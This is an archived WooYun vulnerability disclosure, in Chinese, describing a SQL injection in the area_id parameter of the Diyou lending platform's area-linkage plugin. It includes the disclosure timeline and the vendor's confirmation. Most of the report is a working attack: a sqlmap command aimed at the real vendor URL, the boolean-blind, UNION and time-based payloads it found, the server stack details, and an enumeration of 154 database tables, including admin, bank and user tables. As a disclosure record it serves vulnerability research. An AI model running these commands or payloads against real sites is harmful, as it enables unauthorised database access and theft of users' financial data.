乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-05-15: 细节已通知厂商并且等待厂商处理中 2014-05-16: 厂商已经确认,细节仅向厂商公开 2014-05-19: 细节向第三方安全合作伙伴开放 2014-07-10: 细节向核心白帽子及相关领域专家公开 2014-07-20: 细节向普通白帽子公开 2014-07-30: 细节向实习白帽子公开 2014-08-13: 细节向公众公开
=。=
模块:省市信息联动插件(通杀V4.0,3.1)基于后台读数据库出数据的省市信息联动插件,省市区变量直接转int即可!Location:./?plugins&q=areas&area_id=174http://www.diyou.cc/?plugins&q=areas&area_id=174GET参数area_id未有效过滤导致存在注入通知存在注入点,未做进一步测试,赶紧赶紧赶紧修复!
python sqlmap.py -u "http://www.diyou.cc/?plugins&q=areas&area_id=174" -p "area_id" --batch --dbs --tables -D www.diyou.ccsqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: area_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: plugins&q=areas&area_id=174 AND 8880=8880 Type: UNION query Title: MySQL UNION query (NULL) - 9 columns Payload: plugins&q=areas&area_id=174 UNION ALL SELECT NULL,CONCAT(0x7161706171,0x4e736851515370696e6d,0x7167616671),NULL,NULL,NULL,NULL,NULL,NULL,NULL# Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: plugins&q=areas&area_id=174 AND SLEEP(5)---web server operating system: Linux Debian 6.0 (squeeze)web application technology: PHP 5.3.3, Apache 2.2.16back-end DBMS: MySQL 5.0.11available databases [2]:[*] information_schema[*] www.diyou.ccDatabase: www.diyou.cc[154 tables]+-----------------------------+| diyou_account || diyou_account_balance || diyou_account_bank || diyou_account_cash || diyou_account_fee || diyou_account_fee_type || diyou_account_log || diyou_account_payment || diyou_account_recharge || diyou_account_users || diyou_account_users_bank || diyou_account_web || diyou_approve || diyou_approve_edu || diyou_approve_edu_id5 || diyou_approve_id5 || diyou_approve_realname || diyou_approve_sms || diyou_approve_smslog || diyou_approve_video || diyou_areas || diyou_articles || diyou_articles_pages || diyou_articles_type || diyou_attestations || diyou_attestations_type || diyou_attestations_user || diyou_borrow || diyou_borrow_activity || diyou_borrow_amount || diyou_borrow_amount_apply || diyou_borrow_amount_log || diyou_borrow_amount_type || diyou_borrow_apply || diyou_borrow_auto || diyou_borrow_autolog || diyou_borrow_care || diyou_borrow_change || diyou_borrow_count || diyou_borrow_count_log || diyou_borrow_credit || diyou_borrow_fee || diyou_borrow_fee_loan || diyou_borrow_fee_log || diyou_borrow_fee_type || diyou_borrow_flag || diyou_borrow_frost || diyou_borrow_newtype || diyou_borrow_preview || diyou_borrow_recover || diyou_borrow_repay || diyou_borrow_roam || diyou_borrow_style || diyou_borrow_tender || diyou_borrow_tender_auto || diyou_borrow_tender_autolog || diyou_borrow_tender_web || diyou_borrow_type || diyou_borrow_verify || diyou_borrow_vouch || diyou_borrow_vouch_recover || diyou_borrow_vouch_repay || diyou_comment || diyou_comments || diyou_credit || diyou_credit_class || diyou_credit_log || diyou_credit_rank || diyou_credit_type || diyou_dw_activity_review || diyou_email || diyou_email_log || diyou_email_port || diyou_email_sendlog || diyou_group || diyou_group_articles || diyou_group_comments || diyou_group_log || diyou_group_member || diyou_group_type || diyou_linkages || diyou_linkages_class || diyou_linkages_type || diyou_links || diyou_links_type || diyou_message || diyou_message_receive || diyou_modules || diyou_phone || diyou_phone_log || diyou_phone_port || diyou_phone_smslog || diyou_rating_assets || diyou_rating_company || diyou_rating_contact || diyou_rating_educations || diyou_rating_finance || diyou_rating_houses || diyou_rating_info || diyou_rating_job || diyou_remind || diyou_remind_log || diyou_remind_type || diyou_remind_user || diyou_scrollpic || diyou_scrollpic_type || diyou_site || diyou_site_menu || diyou_sms_type || diyou_spread_add || diyou_spread_log || diyou_spreads_log || diyou_spreads_set || diyou_spreads_users || diyou_sysauto_auto || diyou_sysauto_log || diyou_system || diyou_system_type || diyou_trust || diyou_trust_borrow || diyou_trust_cash || diyou_trust_gopay || diyou_trust_ips || diyou_trust_recharge || diyou_trust_repay || diyou_trust_tender || diyou_ucenter || diyou_ucenter_set || diyou_users || diyou_users_admin || diyou_users_admin_login || diyou_users_admin_type || diyou_users_adminlog || diyou_users_care || diyou_users_care_user || diyou_users_email || diyou_users_email_log || diyou_users_examines || diyou_users_friends || diyou_users_friends_invite || diyou_users_friends_type || diyou_users_info || diyou_users_log || diyou_users_qq || diyou_users_rebut || diyou_users_reglog || diyou_users_return_log || diyou_users_set || diyou_users_sina || diyou_users_type || diyou_users_upfiles || diyou_users_vip || diyou_users_viplog || diyou_users_visit |+-----------------------------+
有效过滤
危害等级:高
漏洞Rank:10
确认时间:2014-05-16 01:34
谢谢,已经交与安全部门解决。
暂无